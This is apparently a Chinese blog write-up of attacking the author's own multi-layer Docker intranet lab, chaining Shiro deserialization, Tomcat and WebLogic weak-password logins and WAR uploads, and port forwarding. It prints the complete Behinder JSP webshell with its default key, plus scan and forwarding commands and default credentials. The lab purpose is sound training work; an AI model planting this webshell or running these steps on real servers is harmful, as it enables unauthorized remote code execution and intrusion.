上一篇 写了用一个 Docker 搭建了一个多层内网环境的靶场
靶场环境:https://github.com/yanshu-smile/CFS-Docker
这次来试着打一下,顺便复现一下常见Java Web服务的漏洞,尝试一下别的工具来完成内网渗透的过程
入口
首先入口是shiro 反序列化 ,用工具shiro_attack 一把梭
注入 冰蝎内存马,用冰蝎连接webshell进行管理
环境变量中 看到 flag
第一层
使用fscan 对内网服务进行扫描
./fs -h 172.16.238.10/24 -np -o res.txt
试着使用一下 冰蝎自带的内网穿透功能 , 将内网的tomcat8 服务转发
公网服务器上开启 用 portmap 开启监听,将内网的端口映射到 8002 上
./portmap -m 2 -p1 8000 -h2 47.99.120.46 -p2 8002
fscan 扫描有 tomcat8 弱密码漏洞 ,burp suite 爆破弱密码 tomcat/tomcat 登录后台
参考链接:
https://blog.csdn.net/weixin_41598660/article/details/107443373
将冰歇马打包成zip 改名为war ,后台上传 war 包
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
冰蝎连接 /shell/shell.jsp , 冰歇马 默认密码 rebeyond ,可以在环境变量看到第二个flag
第二层
查看第二层内网的网段,用fscan进行扫描 ,10.10.5.88 的 7001 端口 是一个weblogic 服务,同样用冰蝎转发出来,用portmap 监听端口接收
./portmap -m 2 -p1 8005 -h2 47.99.120.46 -p2 8006
Weblogic后台地址为:
http://ip:7001/console/login/LoginForm.jsp
输入http://ip:7001/console会自动跳转至后台
爆破弱密码 weblogic/Oracle@123 ,上传 冰蝎马war包 getshell
冰蝎连上webshell之后 ,看到flag
第三层
查看网卡信息 ,获取到最后一层内网地址 ,内网 172.42.66.77:8080 是一个jboss 6.x (最后代理掉了,用本地环境写复现过程)
JbossScan 扫描出有可能存在的漏洞,网上都有相应的POC可以试试
用工具可以直接执行命令,或者反弹shell
如果靶机不出网,也可以尝试弱口令 爆破后台部署webshell,目前这靶机没有发现常规的弱密码
总结
CFS-Docker 构建的漏洞环境还是比较常规的,大家根据不同漏洞环境的Docker,可以加入一些PHP、Linux提权的环境来构建这个内网靶场,但总体来说还是有些许局限性,比如我还没在compose中找到限制靶机出网的配置
文章中使用的一些工具和方法也有点麻烦,大家可以多尝试各种方法,欢迎多交流
1753
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
